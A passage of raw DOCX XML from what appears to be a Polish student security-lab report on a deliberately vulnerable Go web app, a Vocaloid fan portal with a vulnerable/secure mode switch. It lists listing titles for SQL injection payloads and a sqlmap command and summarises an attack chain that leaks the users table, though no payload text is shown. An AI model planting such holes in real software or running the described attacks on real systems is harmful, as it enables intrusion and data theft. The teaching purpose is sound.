      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Spis tabel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Tabela 1. Osoba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF tbl1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Tabela 2. Wskaźnik ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ............................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF tbl2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Tabela 3. ID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ......................................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF tbl3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Tabela 4. Kontrola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ................................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF tbl4 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Spis listingów</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Listing 1. Fragment materiału testowego (bash)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst1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2. Fragment implementacji aplikacji (go)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst2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3. Fragment zapytania lub payloadu SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst3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4. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst4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5. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst5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6. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst6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7. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst7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8. Fragment implementacji aplikacji (go)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst8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9. Fragment zapytania lub payloadu SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst9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10. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst10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11. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst11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12. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst12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13.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lst13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14. Komenda sqlmap potwierdzająca podatność SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst14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15. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst15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16. Żądanie curl użyte do weryfikacji endpointu HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst16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17. Żądanie curl użyte do weryfikacji endpointu HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ......................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst17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18. Żądanie HTTPie użyte do weryfikacji endpointu HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst18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19. Żądanie HTTPie użyte do weryfikacji endpointu HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst19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20. Żądanie HTTPie użyte do weryfikacji endpointu HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst20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21. Fragment materiału testowego (bash)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst21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22. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst22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23. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst23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24. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst24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25.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lst25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26. Fragment implementacji aplikacji (templ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst26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27.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lst27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28. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst28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29.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lst29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30.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lst30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31.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lst31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32.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lst32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33.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lst33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34.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lst34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35.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lst35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36.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lst36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37.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lst37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38.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lst38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39.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lst39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40.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lst40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41.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lst41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42.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lst42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43.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lst43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44. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst44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45.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lst45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46.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lst46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47. Fragment zapytania lub payloadu SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst47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48. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst48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49. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst49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50. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst50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51. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst51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52. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst52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53.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lst53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54. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst54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55.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lst55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56. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst56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57. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst57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58.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lst58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59. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst59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60.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lst60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61.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lst61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62. Fragment implementacji aplikacji (templ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst62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63. Fragment implementacji aplikacji (templ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst63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64. Fragment implementacji aplikacji (templ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ..............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst64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65. Fragment zapytania lub payloadu SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst65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66. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst66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67. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst67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68. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst68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69. Payload SQL Injection użyty w wyszukiwarce biblioteki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst69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70. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst70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71.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lst71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72.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lst72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73. Fragment implementacji aplikacji (html)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst73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74.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lst74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75.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lst75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76. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst76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77.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lst77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78. Fragment materiału testowego (text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst78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79. Żądanie HTTP odtwarzające scenariusz ataku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst79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80. Fragment implementacji aplikacji (go)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst80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81. Komendy uruchamiające testy automatyczne projektu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst81 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Listing 82. Komendy uruchamiające testy automatyczne projektu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .....................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF lst82 \h</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3" w:name="sec3"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>2. Streszczenie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Przedmiotem projektu jest aplikacja internetowa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MikuMiku Fan Hub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> przygotowana jako środowisko laboratoryjne do analizy podatności webowych. System ma formę fanowskiego portalu o Vocaloid, anime, cosplayu i fanarcie. Użytkownik może przeglądać wpisy społeczności, wyszukiwać materiały w bibliotece, komentować posty, aktualizować profil, korzystać z katalogu członków, podglądać pliki w fanart vault oraz sprawdzać dostępność hosta streamu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Projekt nie jest zbiorem odrębnych ekranów testowych. Podatności zostały umieszczone w praktycznych funkcjach aplikacji, czyli w miejscach, w których podobne błędy mogłyby pojawić się w rzeczywistym portalu społecznościowym. Przełącznik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SECURITY_ENABLED</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pozwala porównać zachowanie tej samej funkcji w dwóch trybach. W trybie vulnerable błędy są celowo obecne w normalnych ścieżkach aplikacji, natomiast w trybie secure te same operacje pozostają dostępne, ale dane wejściowe są walidowane, parametryzowane albo traktowane jako zwykły tekst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Zakres obejmuje osiem klas podatności: SQL Injection, Stored XSS, Broken Authentication, Broken Access Control/IDOR, CSRF, Sensitive Data Exposure, Path Traversal/LFI oraz Command Injection. Dla każdej klasy opisano poprawne użycie funkcji, metodę wywołania ataku, wynik w trybie vulnerable oraz zachowanie po przełączeniu aplikacji w tryb secure. Najbardziej rozbudowany scenariusz dotyczy SQL Injection w wyszukiwarce </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vocaloid library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ponieważ pokazuje pełen łańcuch: zwykłe wyszukiwanie, sondę logiczną, rozpoznanie liczby kolumn, enumerację schematu SQLite, wyciek tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, odczyt ukrytych draftów oraz potwierdzenie podatności narzędziem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t>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caloid-fanart-ba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1" w:name="fig1"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 1. Fanartowy motyw MikuMiku Fan Hub. Źródło: grafika wygenerowana AI na potrzeby projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1001"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="4" w:name="sec4"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Cel i charakter projektu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Celem projektu było wykonanie kompletnej aplikacji laboratoryjnej, która pozwala przeprowadzić kontrolowane testy bezpieczeństwa na realistycznych funkcjach. Założeniem nie było ukrywanie podatności w osobnych ekranach testowych, tylko pokazanie, że ten sam błąd implementacyjny może wystąpić w funkcji użytecznej dla użytkownika końcowego.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Aplikacja została przygotowana w technologii Go, Gin, SQLite, Templ, HTMX i Tailwind CSS. Tryb vulnerable oraz secure działają na tej samej aplikacji i tych samych trasach użytkowych. Różnica znajduje się po stronie interpretacji danych wejściowych, autoryzacji, obsługi tokenów CSRF, przechowywania haseł i sposobu wykonywania komend systemowych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">W warstwie wizualnej projekt otrzymał spójną identyfikację </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MikuMiku Fan Hub</w:t>
      </w:r>
      <w:r>
        <w:t>. Normalne ekrany aplikacji zawierają motyw Vocaloid/otaku, fanartowy pasek nagłówka, miniatury graficzne i zachowaną funkcjonalność laboratoryjną: przełącznik vulnerable/secure, inspektor żądań, oś prób ataku oraz podręczną listę payloadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="5" w:name="sec5"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Zakres etyczny i środowisko testowe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wszystkie testy wykonano w kontrolowanym środowisku lokalnym na aplikacji przygotowanej specjalnie na potrzeby przedmiotu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bezpieczeństwo Aplikacji Internetowych</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Zakres obejmował wyłącznie własny kod projektu, lokalną bazę SQLite oraz lokalne endpointy uruchamiane na adresach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>. Nie wykonywano testów na cudzych systemach, publicznych usługach ani adresach należących do podmiotów zewnętrznych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Podejście przyjęte w projekcie odpowiada zasadzie bezpiecznego laboratorium: podatności są celowo wprowadzone w trybie vulnerable, ale ich użycie ma charakter dydaktyczny i jest ograniczone do demonstracji mechanizmu błędu. Tryb secure pokazuje właściwe zabezpieczenia tej samej funkcji, bez zmiany ścieżki użytkowej. Dzięki temu materiał pozwala porównać konsekwencje błędnej implementacji i efekt naprawy bez ryzyka naruszenia obcych zasobów.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DB_PATH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/tmp/bai-lab.db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PORT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:8080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SECURITY_ENABLED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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>false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go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run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main.go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DB_PATH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/tmp/bai-lab.db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PORT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:8080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SECURITY_ENABLED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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>true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go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run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main.go</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2001" w:name="lst1"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
